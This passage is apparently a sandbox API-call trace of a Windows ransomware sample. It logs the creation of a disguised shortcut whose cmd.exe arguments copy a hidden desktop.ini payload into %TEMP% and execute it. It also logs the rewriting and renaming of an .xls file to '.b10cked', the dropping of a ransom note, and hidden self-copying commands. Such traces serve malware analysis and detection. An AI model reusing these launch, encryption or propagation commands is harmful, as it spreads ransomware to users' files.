cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x62\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0132.465] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 
0x65 [0132.465] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x71 | out: lpsz="EXPLORER.EXE \"5OWEKSADHMYQWXMS\" & TYPE \"5OWEKSADHMYQWXMS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x71 [0132.465] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x72 | out: lpsz="EXPLORER.EXE \"5OWEKSADHMYQWXMS\" & TYPE \"5OWEKSADHMYQWXMS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x72 [0132.465] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0132.465] CoInitialize (pvReserved=0x0) returned 0x0 [0132.465] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0132.466] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0132.466] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0132.467] 
ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\desktop.ini\" > \"%TEMP%\\8rav86pb.exe\" && \"%TEMP%\\8rav86pb.exe\"") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0132.468] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0132.468] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS.lnk", fRemember=0) returned 0x0 [0132.475] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0132.475] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0132.475] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0132.475] CoUninitialize () [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\oases7zduwj0fv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18926541921) returned 1 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x107ae [0132.477] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10c96 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10c96 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0132.479] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x864a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x864a, lpOverlapped=0x0) returned 1 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0132.479] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x864a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x864a, lpOverlapped=0x0) returned 1 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=-34378, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x864c [0132.480] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x864a, lpNumberOfBytesRead=0x12ec08, 
lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x864a, lpOverlapped=0x0) returned 1 [0132.480] SetFilePointer (in: hFile=0x114, lDistanceToMove=-34378, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x864c [0132.480] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x864a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x864a, lpOverlapped=0x0) returned 1 [0132.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oases7ZDuwJ0FV.xls", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0132.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oases7ZDuwJ0FV.xls", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oases7ZDuwJ0FV.xls", lpUsedDefaultChar=0x0) returned 18 [0132.484] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10c96 [0132.484] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0132.484] CloseHandle (hObject=0x114) returned 1 [0132.485] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Oases7ZDuwJ0FV.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS") returned 0x2d [0132.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.486] CreateProcessW (in: 
lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xba0, dwThreadId=0xb5c)) returned 1 [0132.488] CloseHandle (hObject=0x110) returned 1 [0132.488] CloseHandle (hObject=0x114) returned 1 [0132.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0132.489] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 1 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0132.489] CompareStringW (Locale=0x400, 
dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0132.489] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0132.489] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0132.489] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0132.489] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.489] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0132.489] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0132.489] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" 
> \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb58, dwThreadId=0xbdc)) returned 1 [0132.492] CloseHandle (hObject=0x110) returned 1 [0132.492] CloseHandle (hObject=0x114) returned 1 [0132.492] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0xffffffff [0132.493] GetLastError () returned 0x2 [0132.493] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0132.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0132.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.495] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0132.495] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0132.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0132.495] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", 
cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0132.495] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.495] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && 